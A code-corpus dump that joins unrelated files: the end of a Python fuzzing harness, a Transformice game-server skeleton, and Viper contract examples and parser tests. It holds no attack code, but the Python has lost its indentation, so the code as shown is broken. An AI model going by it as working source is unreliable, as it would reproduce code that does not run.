log_runtime = logging.getLogger('gentime')
log_runtime.setLevel(log_level)
log_runtime_handler = logging.FileHandler(f"{config['output_folder']}/{log_runtime_filename}", 'w', "utf-8")
log_runtime.addHandler(log_runtime_handler)
if args.debug_to_file:
log_console.addHandler(log_runtime_handler)
# Concatenate all parameters and values together and prefix the parameter
# flag name with '--'
param_string = " ".join(["--" + x + " " + str(config['params'][x]) for x in config['params']])
stats = {}
stats["total_tests"] = 0
stats["gen_fail"] = 0
stats["compile_fail"] = 0
stats["timeout_tests"] = 0
stats["fail_tests"] = 0
stats["test_gentimes"] = []
stats["test_compiletimes"] = []
stats["test_runtimes"] = []
stats["run_return_codes"] = {}
test_count = 0
terminate = False
experiment_start_time = time.perf_counter()
while not terminate:
if args.mode_val != -1:
if args.mode == "count" and args.mode_val <= test_count:
log_console.debug(f"Hit max number of given tests; stopping...")
break
elif args.mode == "time" and args.mode_val <= time.perf_counter() - experiment_start_time:
log_console.debug(f"Executed max number of given seconds; stopping...")
break
elif args.mode == "generate" and test_count != 0:
log_console.debug(f"Generated one test case; stopping...")
sys.exit(0)
test_count += 1
stats["total_tests"] += 1
if not args.debug:
log_console_handler.terminator = '\r'
curr_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
curr_time = "\033[1m\033[31m" + curr_time + "\033[0m"
log_console.debug(f"[{curr_time}] Test count {test_count} - Elapsed time {time.perf_counter() - experiment_start_time} - Mode {args.mode} - Mode Value {args.mode_val}")
gen_seed = args.seed if args.mode == "generate" else random.randrange(sys.maxsize)
log_console.debug(f"Generating test with seed {gen_seed}")
log_runtime.info(f"===== Test count {test_count} with seed {gen_seed}")
config['template_file'] = make_abs_path(config['template_file'], log_console, True)
gen_cmd = f"./build/mtFuzzer {config['template_file']}"\
f" -o {full_output_file_name}"\
f" --seed {gen_seed}"\
f" {param_string}"
gen_result = exec_cmd("generate", gen_cmd, test_count, timeout=args.gen_timeout)
stats["test_gentimes"].append(gen_result["exec_time"])
if gen_result["return_code"] != 0:
stats["gen_fail"] += 1
continue
if args.mode == "generate":
log_console.debug(f"Generated one test case; stopping...")
sys.exit(0)
config['cmake_script_dir'] = make_abs_path(config['cmake_script_dir'], log_console, True)
compile_cmd = f"{os.path.abspath(config['compile_script'])} {full_output_file_name} {config['cmake_script_dir']}"
old_cwd = os.getcwd()
os.chdir(config['output_folder'])
compile_result = exec_cmd("compile", compile_cmd, test_count)
stats["test_compiletimes"].append(compile_result["exec_time"])
if compile_result["return_code"] != 0:
stats["compile_fail"] += 1
os.chdir(old_cwd)
continue
os.chdir(old_cwd)
run_output_file_name = os.path.splitext(f"{full_output_file_name}")[0]
run_cmd = f"{run_output_file_name}"
run_result = exec_cmd("execute", run_cmd, test_count, timeout=args.run_timeout, log_test=args.log_all_tests)
stats["test_runtimes"].append(run_result["exec_time"])
if not run_result['return_code'] in stats['run_return_codes']:
stats['run_return_codes'][run_result['return_code']] = 0
stats['run_return_codes'][run_result['return_code']] += 1
if run_result["return_code"] != 0:
if run_result["exec_time"] == TIMEOUT_STR:
stats["timeout_tests"] += 1
else:
stats["fail_tests"] += 1
if args.stop_on_fail and run_result["exec_time"] != TIMEOUT_STR:
log_console.info("Found execution failure and `stop_on_fail` set; exitting...");
break
continue
experiment_time = time.perf_counter() - experiment_start_time
log_console_handler.terminator = '\n'
log_console.info(f"Finished experiments {config['output_folder']}.")
with open(f"{config['output_folder']}/{args.stats_log}", 'w') as stats_writer:
log_git_repo_data(config['working_dir'], "Generator", stats_writer)
log_git_repo_data(config['spec_repo_dir'], "Specification", stats_writer)
log_git_repo_data(config['lib_repo_dir'], "Library under test", stats_writer)
stats_writer.write(80 * '-' + '\n');
stats_writer.write(f"Seed: {args.seed}\n")
stats_writer.write(f"Gen timeout: {args.gen_timeout}\n")
stats_writer.write(f"Run timeout: {args.run_timeout}\n")
stats_writer.write(f"Parameters: {param_string}\n")
stats_writer.write(80 * '-' + '\n');
stats_writer.write(f"Total experiment time: {datetime.timedelta(seconds=math.trunc(experiment_time))}\n")
stats_writer.write(f"Total test count: {stats['total_tests']}\n")
stats_writer.write(f"Total generation fails: {stats['gen_fail']}\n")
stats_writer.write(f"Total compilation fails: {stats['compile_fail']}\n")
stats_writer.write(f"Total execution fails: {stats['fail_tests']}\n")
stats_writer.write(f"Total execution timeouts: {stats['timeout_tests']}\n")
stats_writer.write(80 * '-' + '\n');
emit_times_stats(stats['test_gentimes'], "generation", stats_writer)
emit_times_stats(stats['test_compiletimes'], "compile", stats_writer)
emit_times_stats(stats['test_runtimes'], "execution", stats_writer)
stats_writer.write(80 * '=' + '\n');
stats_writer.write(f"\nRaw data:\n")
stats_writer.write(yaml.dump(stats))
``` |
{
"source": "0190342791072401740917904E9012740997199/TransformiceServer",
"score": 2
} |
#### File: messages/incoming/IMDummy.py
```python
from ruby.communication.messages.Incoming import Incoming
class IMDummy(Incoming):
tokens = [26, 26]
def dispatch(self, session, buffer_array):
pass
```
#### File: messages/incoming/IMLogin.py
```python
from ruby.communication.messages.Incoming import Incoming
class IMLogin(Incoming):
tokens = [26, 8]
def dispatch(self, session, buffer_array):
pass
```
#### File: ruby/geoip/GeoIP.py
```python
from geoip2 import database
from ruby.utils import Logging
from ruby.utils.Language import Language
class GeoIP:
def __init__(self):
Logging.info("Loading geoip.")
self.__reader = database.Reader('files/GeoLite2-Country.mmdb')
self.__languages = {
Language.PT: {
"PT"
},
Language.BR: {
"BR"
},
Language.EN: {
"US",
"AG",
"CA",
"AU",
"BS",
"BB",
"BZ"
},
Language.ES: {
"AR",
"PY",
"UY",
"CO",
"PE",
"CL",
"EC",
"BO",
"VE",
"SV",
"NI",
"GT",
"CR",
"CU",
"GQ",
"HN",
"PA",
"DO",
"MX",
"ES"
}
}
def get(self, address):
try:
response = self.__reader.country(address)
iso_code = response.country.iso_code
for language in self.__languages:
if iso_code in self.__languages[language]:
return language
except:
pass
return Language.EN
```
#### File: network/buffer/BufferArray.py
```python
import struct
class BufferArray:
def __init__(self, data=b""):
if type(data) == bytes:
self.bytes = data
elif type(data) == str:
self.bytes = data.encode()
else:
self.bytes = b""
def write(self, data):
global bytes
self.bytes += bytes(data, 'utf-8')
def writeBool(self, data):
self.bytes += struct.pack('!?', bool(data))
def writeByte(self, data):
self.bytes += struct.pack('!B', int(data))
def writeBytes(self, data):
self.bytes += data
def writeShort(self, data):
self.bytes += struct.pack('!H', int(data))
def writeInt(self, data):
self.bytes += struct.pack('!I', int(data))
def writeLong(self, data):
self.bytes += struct.pack('!Q', int(data))
def writeUTF(self, data):
data = data.encode()
length = len(data)
self.bytes += struct.pack('!H', length)
self.bytes += data
def readBool(self):
data = struct.unpack('!?', self.bytes[:1])[0]
self.bytes = self.bytes[1:]
return data
def readByte(self):
data = struct.unpack('!B', self.bytes[:1])[0]
self.bytes = self.bytes[1:]
return data
def readBytes(self, length):
data = self.bytes[:length]
self.bytes = self.bytes[length:]
return data
def readShort(self):
data = struct.unpack('!H', self.bytes[:2])[0]
self.bytes = self.bytes[2:]
return data
def readInt(self):
data = struct.unpack('!I', self.bytes[:4])[0]
self.bytes = self.bytes[4:]
return data
def readLong(self):
data = struct.unpack('!Q', self.bytes[:8])[0]
self.bytes = self.bytes[8:]
return data
def readUTF(self):
length = struct.unpack('!H', self.bytes[:2])[0]
data = self.bytes[2:(length + 2)]
self.bytes = self.bytes[(2 + length):]
return data.decode()
def toByteArray(self):
return self.bytes
def __len__(self):
return len(self.bytes)
def bytesAvailable(self):
return len(self.bytes) > 0
```
#### File: ruby/network/Network.py
```python
import asyncore
import socket
from ruby.network.sessions.Session import Session
class Network(asyncore.dispatcher):
def __init__(self, host, port, backlog):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host, port))
self.listen(backlog)
def handle_accepted(self, socket, address):
Session(socket, address)
```
#### File: network/sessions/Session.py
```python
import asyncore
import random
from ruby import Controller
from ruby.network.buffer.BufferArray import BufferArray
from ruby.network.buffer.Encoder import Encoder
from ruby.utils import Logging
from ruby.utils.Language import Language
class Session(asyncore.dispatcher_with_send):
def __init__(self, socket, address):
super().__init__(socket)
Controller.session_manager.append(self)
self.__socket = socket
self.__disposed = False
self.__client = None
self.__encoder = Encoder()
self.ipAddress = address[0]
self.language = Language(0)
self.lastPacketID = 0
self.authKey = random.randrange(0xFFFF)
def handle_read(self):
if self.__disposed:
return
self.out_buffer = self.recv(1024)
if not self.out_buffer:
self.disconnect()
return
if self.out_buffer[0] == 60 and self.__client is None:
self.send(
"<cross-domain-policy><allow-access-from domain=\"*\" to-ports=\"*\" /></cross-domain-policy>")
self.disconnect()
return
length = len(self.out_buffer)
if length < 5:
return
buffer = BufferArray(self.out_buffer)
sizeByte = buffer.readByte()
if sizeByte < 1 or sizeByte > 3:
return
packetLen = buffer.readByte() if sizeByte == 1 else buffer.readShort() if sizeByte == 2 else ((
buffer.readByte() & 0xFF) << 16) | (
(
buffer.readByte() & 0xFF) << 8) | (
buffer.readByte() & 0xFF) if sizeByte == 3 else 0
fullPacketLen = packetLen + sizeByte + 2
if packetLen == 0 or length < fullPacketLen:
return
packetId = buffer.readByte()
if packetId != self.lastPacketID:
self.disconnect()
return
self.lastPacketID = (packetId + 1) % 100
code1 = buffer.readByte()
code2 = buffer.readByte()
opcodes = code2 + (code1 << 8)
if Controller.packet_manager.__contains__(opcodes):
Controller.packet_manager.get(opcodes).dispatch(self, buffer)
else:
Logging.alert(f"Packet not found: [{code1}, {code2}] with opcode: {opcodes}")
def writable(self):
if not self.__disposed:
return True
def send(self, data):
self.socket.send(self.__encoder.encoder(data))
def disconnect(self):
if not self.__disposed:
Controller.session_manager.remove(self)
self.__disposed = True
self.close()
```
#### File: TransformiceServer/ruby/Server.py
```python
import asyncore
from ruby.network.Network import Network
from ruby.utils import Logging
class Server:
def __init__(self, host, ports, backlog):
self.__host = host
self.__ports = ports
self.__backlog = backlog
self.__validPorts = []
def start(self):
Logging.info("Starting server.")
for port in self.__ports:
try:
Network(self.__host, port, self.__backlog)
self.__validPorts.append(port)
except Exception as e:
Logging.alert(f"Can't bind on port: {port}")
Logging.info(f"Server working on ports: {self.__validPorts}")
asyncore.loop(timeout=30.0, use_poll=False, map=None, count=None)
```
#### File: ruby/tests/Tests.py
```python
from ruby.network.buffer.Encoder import Encoder
class Tests:
@staticmethod
def send(data):
encoder = Encoder()
message = encoder.encoder(data)
print(message)
pass
```
#### File: ruby/utils/Logging.py
```python
import datetime
def info(output):
print(str(datetime.datetime.now().strftime("%X")) + f" [INFO] {output}")
return
def warn(output):
print(str(datetime.datetime.now().strftime("%X")) + f" [WARN] {output}")
return
def alert(output):
print(str(datetime.datetime.now().strftime("%X")) + f" [ALERT] {output}")
return
def session(address, output):
print(str(datetime.datetime.now().strftime("%X")) + f" [SESSION] [{address}] {output}")
return
def packet(action, output):
print(str(datetime.datetime.now().strftime("%X")) + f" [PACKET] [{action}] {output}")
return
``` |
{
"source": "01admin/viper",
"score": 4
} |
#### File: examples/voting/ballot.v.py
```python
voters: public({
# weight is accumulated by delegation
weight: num,
# if true, that person already voted
voted: bool,
# person delegated to
delegate: address,
# index of the voted proposal
vote: num
}[address])
# This is a type for a list of proposals.
proposals: public({
# short name (up to 32 bytes)
name: bytes32,
# number of accumulated votes
vote_count: num
}[num])
voter_count: public(num)
chairperson: public(address)
# Setup global variables
def __init__(_proposalNames: bytes32[5]):
self.chairperson = msg.sender
self.voter_count = 0
for i in range(5):
self.proposals[i] = {
name: _proposalNames[i],
vote_count: 0
}
# Give `voter` the right to vote on this ballot.
# May only be called by `chairperson`.
def give_right_to_vote(voter: address):
# Throws if sender is not chairpers
assert msg.sender == self.chairperson
# Throws if voter has already voted
assert not self.voters[voter].voted
# Throws if voters voting weight isn't 0
assert self.voters[voter].weight == 0
self.voters[voter].weight = 1
self.voter_count += 1
# Delegate your vote to the voter `to`.
def delegate(_to: address):
to = _to
# Throws if sender has already voted
assert not self.voters[msg.sender].voted
# Throws if sender tries to delegate their vote to themselves
assert not msg.sender == to
# loop can delegate votes up to the current voter count
for i in range(self.voter_count, self.voter_count+1):
if self.voters[to].delegate:
# Because there are not while loops, use recursion to forward the delegation
# self.delegate(self.voters[to].delegate)
assert self.voters[to].delegate != msg.sender
to = self.voters[to].delegate
self.voters[msg.sender].voted = True
self.voters[msg.sender].delegate = to
if self.voters[to].voted:
# If the delegate already voted,
# directly add to the number of votes
self.proposals[self.voters[to].vote].vote_count += self.voters[msg.sender].weight
else:
# If the delegate did not vote yet,
# add to her weight.
self.voters[to].weight += self.voters[msg.sender].weight
# Give your vote (including votes delegated to you)
# to proposal `proposals[proposal].name`.
def vote(proposal: num):
assert not self.voters[msg.sender].voted
self.voters[msg.sender].voted = True
self.voters[msg.sender].vote = proposal
# If `proposal` is out of the range of the array,
# this will throw automatically and revert all
# changes.
self.proposals[proposal].vote_count += self.voters[msg.sender].weight
# Computes the winning proposal taking all
# previous votes into account.
@constant
def winning_proposal() -> num:
winning_vote_count = 0
for i in range(5):
if self.proposals[i].vote_count > winning_vote_count:
winning_vote_count = self.proposals[i].vote_count
winning_proposal = i
return winning_proposal
# Calls winning_proposal() function to get the index
# of the winner contained in the proposals array and then
# returns the name of the winner
@constant
def winner_name() -> bytes32:
return self.proposals[self.winning_proposal()].name
```
#### File: examples/wallet/wallet_test.py
```python
from ethereum.tools import tester as t
from ethereum import utils
c = t.Chain()
c.head_state.gas_limit = 10**9
x = c.contract(open('wallet.v.py').read(), args=[[t.a1, t.a2, t.a3, t.a4, t.a5], 3], language='viper')
print(c.last_tx.data[-192:])
c.tx(sender=t.k1, to=x.address, value=10**17)
print([utils.encode_hex(a) for a in [t.a1, t.a2, t.a3, t.a4, t.a5]])
def sign(seq, to, value, data, key):
h1 = utils.sha3(utils.encode_int32(seq) + b'\x00' * 12 + to + utils.encode_int32(value) + data)
h2 = utils.sha3(b"\x19Ethereum Signed Message:\n32" + h1)
return list(utils.ecsign(h2, key))
to, value, data = b'\x35' * 20, 10**16, b""
assert x.approve(0, to, value, data, [sign(0, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k3, 0, t.k5)])
try:
x.approve(1, to, value, data, [sign(1, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, 0, 0, t.k5)])
success = True
except:
success = False
assert not success
try:
x.approve(1, to, value, data, [sign(1, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k7, 0, t.k5)])
success = True
except:
success = False
assert not success
try:
assert x.approve(0, to, value, data, [sign(0, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k3, 0, t.k5)])
success = True
except:
success = False
assert not success
assert x.approve(1, to, value, data, [sign(1, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k3, 0, t.k5)])
print("Basic tests passed")
zero_address = "0x0000000000000000000000000000000000000000"
accounts = ["0x776ba14735ff84789320718cf0aa43e91f7a8ce1", "0x095ce4e4240fa66ff90282c26847456e3f3b5002"]
recipient = "0x776ba14735ff84789320718cf0aa43e91f7a8ce1"
raw_sigs = [
"<KEY>",
"0xc84fe5d2a600e033930e0cf73f26e78f4c65b134f9c9992f60f08ce0863abdbe0548a6e8aa2d952659f29c67106b59fdfcd64d67df03c1df620c70c85578ae701b"
]
sigs = [(utils.big_endian_to_int(x[64:]), utils.big_endian_to_int(x[:32]), utils.big_endian_to_int(x[32:64])) for x in
map(lambda z: utils.decode_hex(z[2:]), raw_sigs)]
h = utils.sha3(utils.encode_int32(0) + b'\x00' * 12 + utils.decode_hex(recipient[2:]) + utils.encode_int32(25) + b'')
h2 = utils.sha3(b"\x19Ethereum Signed Message:\n32" + h)
assert '0x'+utils.encode_hex(utils.sha3(utils.ecrecover_to_pub(h2, sigs[0][0], sigs[0][1], sigs[0][2]))[12:]) == accounts[0]
assert '0x'+utils.encode_hex(utils.sha3(utils.ecrecover_to_pub(h2, sigs[1][0], sigs[1][1], sigs[1][2]))[12:]) == accounts[1]
x2 = c.contract(open('wallet.v.py').read(), args=[accounts + [t.a3, zero_address, zero_address], 2], language='viper')
c.tx(sender=t.k1, to=x2.address, value=10**17)
assert x2.approve(0, recipient, 25, "", sigs + [[0, 0, 0]] * 3)
print("Javascript signature tests passed")
```
#### File: examples/wallet/wallet.v.py
```python
addrs: address[5]
threshold: num
seq: num
def __init__(_addrs: address[5], _threshold: num):
for i in range(5):
if _addrs[i]:
self.addrs[i] = _addrs[i]
self.threshold = _threshold
def approve(_seq: num, to: address, value: wei_value, data: bytes <= 4096, sigdata: num256[3][5]) -> bytes <= 4096:
approvals = 0
h = sha3(concat(as_bytes32(_seq), as_bytes32(to), as_bytes32(value), data))
h2 = sha3(concat("\x19Ethereum Signed Message:\n32", h))
assert self.seq == _seq
for i in range(5):
if sigdata[i][0]:
assert ecrecover(h2, sigdata[i][0], sigdata[i][1], sigdata[i][2]) == self.addrs[i]
approvals += 1
assert approvals >= self.threshold
self.seq += 1
return raw_call(to, data, outsize=4096, gas=3000000, value=value)
```
#### File: viper/tests/test_parser.py
```python
import pytest
from .setup_transaction_tests import chain as s, tester as t, ethereum_utils as u, check_gas, \
get_contract_with_gas_estimation, get_contract
def test_null_code():
null_code = """
def foo():
pass
"""
c = get_contract_with_gas_estimation(null_code)
c.foo()
print('Successfully executed a null function')
def test_basic_code():
basic_code = """
def foo(x: num) -> num:
return x * 2
"""
c = get_contract_with_gas_estimation(basic_code)
assert c.foo(9) == 18
print('Passed basic code test')
def test_basic_repeater():
basic_repeater = """
def repeat(z: num) -> num:
x = 0
for i in range(6):
x = x + z
return(x)
"""
c = get_contract_with_gas_estimation(basic_repeater)
assert c.repeat(9) == 54
print('Passed basic repeater test')
def test_more_complex_repeater():
more_complex_repeater = """
def repeat() -> num:
out = 0
for i in range(6):
out = out * 10
for j in range(4):
out = out + j
return(out)
"""
c = get_contract_with_gas_estimation(more_complex_repeater)
assert c.repeat() == 666666
print('Passed complex repeater test')
def test_offset_repeater():
offset_repeater = """
def sum() -> num:
out = 0
for i in range(80, 121):
out = out + i
return(out)
"""
c = get_contract_with_gas_estimation(offset_repeater)
assert c.sum() == 4100
print('Passed repeater with offset test')
def test_offset_repeater_2():
offset_repeater_2 = """
def sum(frm: num, to: num) -> num:
out = 0
for i in range(frm, frm + 101):
if i == to:
break
out = out + i
return(out)
"""
c = get_contract_with_gas_estimation(offset_repeater_2)
assert c.sum(100, 99999) == 15150
assert c.sum(70, 131) == 6100
print('Passed more complex repeater with offset test')
def test_array_accessor():
array_accessor = """
def test_array(x: num, y: num, z: num, w: num) -> num:
a: num[4]
a[0] = x
a[1] = y
a[2] = z
a[3] = w
return a[0] * 1000 + a[1] * 100 + a[2] * 10 + a[3]
"""
c = get_contract_with_gas_estimation(array_accessor)
assert c.test_array(2, 7, 1, 8) == 2718
print('Passed basic array accessor test')
def test_two_d_array_accessor():
two_d_array_accessor = """
def test_array(x: num, y: num, z: num, w: num) -> num:
a: num[2][2]
a[0][0] = x
a[0][1] = y
a[1][0] = z
a[1][1] = w
return a[0][0] * 1000 + a[0][1] * 100 + a[1][0] * 10 + a[1][1]
"""
c = get_contract_with_gas_estimation(two_d_array_accessor)
assert c.test_array(2, 7, 1, 8) == 2718
print('Passed complex array accessor test')
def test_digit_reverser():
digit_reverser = """
def reverse_digits(x: num) -> num:
dig: num[6]
z = x
for i in range(6):
dig[i] = z % 10
z = z / 10
o = 0
for i in range(6):
o = o * 10 + dig[i]
return o
"""
c = get_contract_with_gas_estimation(digit_reverser)
assert c.reverse_digits(123456) == 654321
print('Passed digit reverser test')
def test_state_accessor():
state_accessor = """
y: num[num]
def oo():
self.y[3] = 5
def foo() -> num:
return self.y[3]
"""
c = get_contract_with_gas_estimation(state_accessor)
c.oo()
assert c.foo() == 5
print('Passed basic state accessor test')
def test_arbitration_code():
arbitration_code = """
buyer: address
seller: address
arbitrator: address
def setup(_seller: address, _arbitrator: address):
if not self.buyer:
self.buyer = msg.sender
self.seller = _seller
self.arbitrator = _arbitrator
def finalize():
assert msg.sender == self.buyer or msg.sender == self.arbitrator
send(self.seller, self.balance)
def refund():
assert msg.sender == self.seller or msg.sender == self.arbitrator
send(self.buyer, self.balance)
"""
c = get_contract_with_gas_estimation(arbitration_code, value=1)
c.setup(t.a1, t.a2, sender=t.k0)
try:
c.finalize(sender=t.k1)
success = True
except:
success = False
assert not success
c.finalize(sender=t.k0)
print('Passed escrow test')
def test_arbitration_code_with_init():
arbitration_code_with_init = """
buyer: address
seller: address
arbitrator: address
@payable
def __init__(_seller: address, _arbitrator: address):
if not self.buyer:
self.buyer = msg.sender
self.seller = _seller
self.arbitrator = _arbitrator
def finalize():
assert msg.sender == self.buyer or msg.sender == self.arbitrator
send(self.seller, self.balance)
def refund():
assert msg.sender == self.seller or msg.sender == self.arbitrator
send(self.buyer, self.balance)
"""
c = get_contract_with_gas_estimation(arbitration_code_with_init, args=[t.a1, t.a2], sender=t.k0, value=1)
try:
c.finalize(sender=t.k1)
success = True
except t.TransactionFailed:
success = False
assert not success
c.finalize(sender=t.k0)
print('Passed escrow test with initializer')
def test_send():
send_test = """
def foo():
send(msg.sender, self.balance+1)
def fop():
send(msg.sender, 10)
"""
c = s.contract(send_test, language='viper', value=10)
with pytest.raises(t.TransactionFailed):
c.foo()
c.fop()
with pytest.raises(t.TransactionFailed):
c.fop()
def test_decimal_test():
decimal_test = """
def foo() -> num:
return(floor(999.0))
def fop() -> num:
return(floor(333.0 + 666.0))
def foq() -> num:
return(floor(1332.1 - 333.1))
def bar() -> num:
return(floor(27.0 * 37.0))
def baz() -> num:
x = 27.0
return(floor(x * 37.0))
def baffle() -> num:
return(floor(27.0 * 37))
def mok() -> num:
return(floor(999999.0 / 7.0 / 11.0 / 13.0))
def mol() -> num:
return(floor(499.5 / 0.5))
def mom() -> num:
return(floor(1498.5 / 1.5))
def mon() -> num:
return(floor(2997.0 / 3))
def moo() -> num:
return(floor(2997 / 3.0))
def foom() -> num:
return(floor(1999.0 % 1000.0))
def foon() -> num:
return(floor(1999.0 % 1000))
def foop() -> num:
return(floor(1999 % 1000.0))
"""
c = get_contract(decimal_test)
pre_txs = len(s.head_state.receipts)
assert c.foo() == 999
assert c.fop() == 999
assert c.foq() == 999
assert c.bar() == 999
assert c.baz() == 999
assert c.baffle() == 999
assert c.mok() == 999
assert c.mol() == 999
assert c.mom() == 999
assert c.mon() == 999
assert c.moo() == 999
assert c.foom() == 999
assert c.foon() == 999
assert c.foop() == 999
post_txs = len(s.head_state.receipts)
print('Passed basic addition, subtraction and multiplication tests')
check_gas(decimal_test, num_txs=(post_txs - pre_txs))
def test_harder_decimal_test():
harder_decimal_test = """
def phooey(inp: decimal) -> decimal:
x = 10000.0
for i in range(4):
x = x * inp
return x
def arg(inp: decimal) -> decimal:
return inp
def garg() -> decimal:
x = 4.5
x *= 1.5
return x
def harg() -> decimal:
x = 4.5
x *= 2
return x
def iarg() -> wei_value:
x = as_wei_value(7, wei)
x *= 2
return x
"""
c = get_contract(harder_decimal_test)
assert c.phooey(1.2) == 20736.0
assert c.phooey(-1.2) == 20736.0
assert c.arg(-3.7) == -3.7
assert c.arg(3.7) == 3.7
assert c.garg() == 6.75
assert c.harg() == 9.0
assert c.iarg() == 14
print('Passed fractional multiplication test')
def test_break_test():
break_test = """
def log(n: num) -> num:
c = n * 1.0
output = 0
for i in range(400):
c = c / 1.2589
if c < 1.0:
output = i
break
return output
"""
c = get_contract_with_gas_estimation(break_test)
assert c.log(1) == 0
assert c.log(2) == 3
assert c.log(10) == 10
assert c.log(200) == 23
print('Passed for-loop break test')
def test_break_test_2():
break_test_2 = """
def log(n: num) -> num:
c = n * 1.0
output = 0
for i in range(40):
if c < 10:
output = i * 10
break
c = c / 10
for i in range(10):
c = c / 1.2589
if c < 1.0:
output = output + i
break
return output
"""
c = get_contract_with_gas_estimation(break_test_2)
assert c.log(1) == 0
assert c.log(2) == 3
assert c.log(10) == 10
assert c.log(200) == 23
assert c.log(4000000) == 66
print('Passed for-loop break test 2')
def test_augassign_test():
augassign_test = """
def augadd(x: num, y: num) -> num:
z = x
z += y
return z
def augmul(x: num, y: num) -> num:
z = x
z *= y
return z
def augsub(x: num, y: num) -> num:
z = x
z -= y
return z
def augdiv(x: num, y: num) -> num:
z = x
z /= y
return z
def augmod(x: num, y: num) -> num:
z = x
z %= y
return z
"""
c = get_contract(augassign_test)
assert c.augadd(5, 12) == 17
assert c.augmul(5, 12) == 60
assert c.augsub(5, 12) == -7
assert c.augdiv(5, 12) == 0
assert c.augmod(5, 12) == 5
print('Passed aug-assignment test')
def test_break_test_3():
break_test_3 = """
def log(n: num) -> num:
c = decimal(n)
output = 0
for i in range(40):
if c < 10:
output = i * 10
break
c /= 10
for i in range(10):
c /= 1.2589
if c < 1:
output = output + i
break
return output
"""
c = get_contract_with_gas_estimation(break_test_3)
assert c.log(1) == 0
assert c.log(2) == 3
assert c.log(10) == 10
assert c.log(200) == 23
assert c.log(4000000) == 66
print('Passed aug-assignment break composite test')
def test_init_argument_test():
init_argument_test = """
moose: num
def __init__(_moose: num):
self.moose = _moose
def returnMoose() -> num:
return self.moose
"""
c = get_contract_with_gas_estimation(init_argument_test, args=[5])
assert c.returnMoose() == 5
print('Passed init argument test')
def test_constructor_advanced_code():
constructor_advanced_code = """
twox: num
def __init__(x: num):
self.twox = x * 2
def get_twox() -> num:
return self.twox
"""
c = get_contract_with_gas_estimation(constructor_advanced_code, args=[5])
assert c.get_twox() == 10
def test_constructor_advanced_code2():
constructor_advanced_code2 = """
comb: num
def __init__(x: num[2], y: bytes <= 3, z: num):
self.comb = x[0] * 1000 + x[1] * 100 + len(y) * 10 + z
def get_comb() -> num:
return self.comb
"""
c = get_contract_with_gas_estimation(constructor_advanced_code2, args=[[5,7], "dog", 8])
assert c.get_comb() == 5738
print("Passed advanced init argument tests")
def test_permanent_variables_test():
permanent_variables_test = """
var: {a: num, b: num}
def __init__(a: num, b: num):
self.var.a = a
self.var.b = b
def returnMoose() -> num:
return self.var.a * 10 + self.var.b
"""
c = get_contract_with_gas_estimation(permanent_variables_test, args=[5, 7])
assert c.returnMoose() == 57
print('Passed init argument and variable member test')
def test_crowdfund():
crowdfund = """
funders: {sender: address, value: wei_value}[num]
nextFunderIndex: num
beneficiary: address
deadline: timestamp
goal: wei_value
refundIndex: num
timelimit: timedelta
def __init__(_beneficiary: address, _goal: wei_value, _timelimit: timedelta):
self.beneficiary = _beneficiary
self.deadline = block.timestamp + _timelimit
self.timelimit = _timelimit
self.goal = _goal
@payable
def participate():
assert block.timestamp < self.deadline
nfi = self.nextFunderIndex
self.funders[nfi].sender = msg.sender
self.funders[nfi].value = msg.value
self.nextFunderIndex = nfi + 1
@constant
def expired() -> bool:
return block.timestamp >= self.deadline
@constant
def timestamp() -> timestamp:
return block.timestamp
@constant
def deadline() -> timestamp:
return self.deadline
@constant
def timelimit() -> timedelta:
return self.timelimit
@constant
def reached() -> bool:
return self.balance >= self.goal
def finalize():
assert block.timestamp >= self.deadline and self.balance >= self.goal
selfdestruct(self.beneficiary)
def refund():
ind = self.refundIndex
for i in range(ind, ind + 30):
if i >= self.nextFunderIndex:
self.refundIndex = self.nextFunderIndex
return
send(self.funders[i].sender, self.funders[i].value)
self.funders[i].sender = 0x0000000000000000000000000000000000000000
self.funders[i].value = 0
self.refundIndex = ind + 30
"""
c = get_contract(crowdfund, args=[t.a1, 50, 600])
c.participate(value=5)
assert c.timelimit() == 600
assert c.deadline() - c.timestamp() == 600
assert not c.expired()
assert not c.reached()
c.participate(value=49)
assert c.reached()
pre_bal = s.head_state.get_balance(t.a1)
s.head_state.timestamp += 1000
assert c.expired()
c.finalize()
post_bal = s.head_state.get_balance(t.a1)
assert post_bal - pre_bal == 54
c = get_contract(crowdfund, args=[t.a1, 50, 600])
c.participate(value=1, sender=t.k3)
c.participate(value=2, sender=t.k4)
c.participate(value=3, sender=t.k5)
c.participate(value=4, sender=t.k6)
s.head_state.timestamp += 1000
assert c.expired()
assert not c.reached()
pre_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
c.refund()
post_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
assert [y-x for x, y in zip(pre_bals, post_bals)] == [1, 2, 3, 4]
print('Passed composite crowdfund test')
def test_comment_test():
comment_test = """
def foo() -> num:
# Returns 3
return 3
"""
c = get_contract_with_gas_estimation(comment_test)
assert c.foo() == 3
print('Passed comment test')
def test_packing_test():
packing_test = """
x: num
y: num[5]
z: {foo: num[3], bar: {a: num, b: num}[2]}
a: num
def foo() -> num:
self.x = 1
self.y[0] = 2
self.y[4] = 4
self.z.foo[0] = 8
self.z.foo[2] = 16
self.z.bar[0].a = 32
self.z.bar[0].b = 64
self.z.bar[1].a = 128
self.z.bar[1].b = 256
self.a = 512
return self.x + self.y[0] + self.y[4] + self.z.foo[0] + self.z.foo[2] + \
self.z.bar[0].a + self.z.bar[0].b + self.z.bar[1].a + self.z.bar[1].b + self.a
def fop() -> num:
_x: num
_y: num[5]
_z: {foo: num[3], bar: {a: num, b: num}[2]}
_a: num
_x = 1
_y[0] = 2
_y[4] = 4
_z.foo[0] = 8
_z.foo[2] = 16
_z.bar[0].a = 32
_z.bar[0].b = 64
_z.bar[1].a = 128
_z.bar[1].b = 256
_a = 512
return _x + _y[0] + _y[4] + _z.foo[0] + _z.foo[2] + \
_z.bar[0].a + _z.bar[0].b + _z.bar[1].a + _z.bar[1].b + _a
"""
c = get_contract_with_gas_estimation(packing_test)
assert c.foo() == 1023, c.foo()
assert c.fop() == 1023, c.fop()
print('Passed packing test')
def test_multi_setter_test():
multi_setter_test = """
